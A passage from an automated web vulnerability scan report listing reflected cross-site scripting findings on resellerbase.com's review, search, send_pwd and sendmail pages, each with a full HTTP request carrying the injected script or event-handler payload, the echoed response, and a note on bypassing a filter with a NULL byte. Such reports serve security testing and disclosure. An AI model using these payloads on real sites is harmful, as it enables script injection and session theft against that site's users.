User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php?id=555-555-0199@example.com&rating=474c24\"><a>496b74a6ee9" />
...[SNIP]...

2.4129. http://www.resellerbase.com/review.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /review.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58202<script>alert(1)</script>4a8ceefa9ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /review.php58202<script>alert(1)</script>4a8ceefa9ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /review.php58202<script>alert(1)</script>4a8ceefa9ba/ was not found on this server.</p>
...[SNIP]...

2.4130. http://www.resellerbase.com/review.php/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /review.php/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f454d"><a>f7bb226c5dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f454d\"><a>f7bb226c5dc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /review.php/?f454d"><a>f7bb226c5dc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/review.php/?f454d\"><a>f7bb226c5dc=1" />
...[SNIP]...

2.4131. http://www.resellerbase.com/robots.txt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /robots.txt

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aed64<script>alert(1)</script>dc1b735c636 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /robots.txtaed64<script>alert(1)</script>dc1b735c636 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /robots.txtaed64<script>alert(1)</script>dc1b735c636 was not found on this server.</p>
...[SNIP]...

2.4132. http://www.resellerbase.com/rss.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /rss.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e83e<script>alert(1)</script>b0affda86ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss.php7e83e<script>alert(1)</script>b0affda86ae HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rss.php7e83e<script>alert(1)</script>b0affda86ae was not found on this server.</p>
...[SNIP]...

2.4133. http://www.resellerbase.com/rss.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /rss.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload faec4<script>alert(1)</script>acf1e70290e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss.phpfaec4<script>alert(1)</script>acf1e70290e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /rss.phpfaec4<script>alert(1)</script>acf1e70290e/ was not found on this server.</p>
...[SNIP]...

2.4134. http://www.resellerbase.com/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b800<script>alert(1)</script>163158fb6ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php3b800<script>alert(1)</script>163158fb6ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /search.php3b800<script>alert(1)</script>163158fb6ba was not found on this server.</p>
...[SNIP]...

2.4135. http://www.resellerbase.com/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /search.php

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf5a"style%3d"x%3aexpression(alert(1))"b855927cf70 was submitted in the keyword parameter. This input was echoed as ecf5a"style="x:expression(alert(1))"b855927cf70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search.php?keyword=search...ecf5a"style%3d"x%3aexpression(alert(1))"b855927cf70&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: searc
...[SNIP]...
<input type="text" name="keyword" size="20"

value="search...ecf5a"style="x:expression(alert(1))"b855927cf70"
/>
...[SNIP]...

2.4136. http://www.resellerbase.com/send_pwd.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /send_pwd.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f03ad<script>alert(1)</script>78edb21d00d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /send_pwd.phpf03ad<script>alert(1)</script>78edb21d00d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.phpf03ad<script>alert(1)</script>78edb21d00d was not found on this server.</p>
...[SNIP]...

2.4137. http://www.resellerbase.com/send_pwd.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /send_pwd.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14272<script>alert(1)</script>a9bbd871f9bec44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php14272<script>alert(1)</script>a9bbd871f9bec44cd?username=Peter+Wiener&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:05:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.php14272<script>alert(1)</script>a9bbd871f9bec44cd?username=Peter+Wiener&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password was not found on this server.</p>
...[SNIP]...

2.4138. http://www.resellerbase.com/send_pwd.php [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /send_pwd.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46068"><img%20src%3da%20onerror%3dalert(1)>eebc05df5fea5051f was submitted in the email parameter. This input was echoed as 46068\"><img src=a onerror=alert(1)>eebc05df5fea5051f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php?username=Peter+Wiener&email=wiener@example.com46068"><img%20src%3da%20onerror%3dalert(1)>eebc05df5fea5051f&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Password</title
...[SNIP]...
<input class="text3" type="text" name="email" size="40" value="wiener@example.com46068\"><img src=a onerror=alert(1)>eebc05df5fea5051f" />
...[SNIP]...

2.4139. http://www.resellerbase.com/send_pwd.php [username parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /send_pwd.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106b1"><img%20src%3da%20onerror%3dalert(1)>c9df08aa572de9f74 was submitted in the username parameter. This input was echoed as 106b1\"><img src=a onerror=alert(1)>c9df08aa572de9f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /send_pwd.php?username=Peter+Wiener106b1"><img%20src%3da%20onerror%3dalert(1)>c9df08aa572de9f74&email=wiener@example.com&pflag=login_pwd&submit=Send+My+Password HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/send_pwd.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Password</title
...[SNIP]...
<input class="text3" type="text" name="username" size="40" value="Peter Wiener106b1\"><img src=a onerror=alert(1)>c9df08aa572de9f74" />
...[SNIP]...

2.4140. http://www.resellerbase.com/send_pwd.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /send_pwd.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4b738<script>alert(1)</script>1c86327195d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /send_pwd.php4b738<script>alert(1)</script>1c86327195d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /send_pwd.php4b738<script>alert(1)</script>1c86327195d/ was not found on this server.</p>
...[SNIP]...

2.4141. http://www.resellerbase.com/sendmail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ad4e<script>alert(1)</script>e659b0ba23722b75d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php2ad4e<script>alert(1)</script>e659b0ba23722b75d?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php2ad4e<script>alert(1)</script>e659b0ba23722b75d?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= was not found on this server.</p>
...[SNIP]...

2.4142. http://www.resellerbase.com/sendmail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 65f55<script>alert(1)</script>83fd5d7c860 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendmail.php65f55<script>alert(1)</script>83fd5d7c860 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/robots.txt
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:07:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /sendmail.php65f55<script>alert(1)</script>83fd5d7c860 was not found on this server.</p>
...[SNIP]...

2.4143. http://www.resellerbase.com/sendmail.php [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c66d"><img%20src%3da%20onerror%3dalert(1)>6b344a87618af2400 was submitted in the email parameter. This input was echoed as 1c66d\"><img src=a onerror=alert(1)>6b344a87618af2400 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com1c66d"><img%20src%3da%20onerror%3dalert(1)>6b344a87618af2400&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input class="text3" type="text" name="email" size="40" value="wiener@example.com1c66d\"><img src=a onerror=alert(1)>6b344a87618af2400" />
...[SNIP]...

2.4144. http://www.resellerbase.com/sendmail.php [lid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4655f"><img%20src%3da%20onerror%3dalert(1)>43056900ec656ec60 was submitted in the lid parameter. This input was echoed as 4655f\"><img src=a onerror=alert(1)>43056900ec656ec60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /sendmail.php?to=&lid=4655f"><img%20src%3da%20onerror%3dalert(1)>43056900ec656ec60&u=&captcha_key=555-555-0199@example.com&email=wiener@example.com&subject=555-555-0199@example.com&name=Peter+Wiener&pflag=send&submit=Send+Email&revid= HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/sendmail.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="lid" value="4655f\"><img src=a onerror=alert(1)>43056900ec656ec60" />
...[SNIP]...

2.4145. http://www.resellerbase.com/sendmail.php [lid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The value of the lid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5858b"><img%20src%3da%20onerror%3dalert(1)>8cab1244a38 was submitted in the lid parameter. This input was echoed as 5858b\"><img src=a onerror=alert(1)>8cab1244a38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sendmail.php?lid=65858b"><img%20src%3da%20onerror%3dalert(1)>8cab1244a38 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Send Email</title>
<
...[SNIP]...
<input type="hidden" name="lid" value="65858b\"><img src=a onerror=alert(1)>8cab1244a38" />
...[SNIP]...

2.4146. http://www.resellerbase.com/sendmail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /sendmail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a47c<img%20src%3da%20onerror%3dalert(1)>16d4794a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a47c<img src=a onerror=alert(1)>16d4794a3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

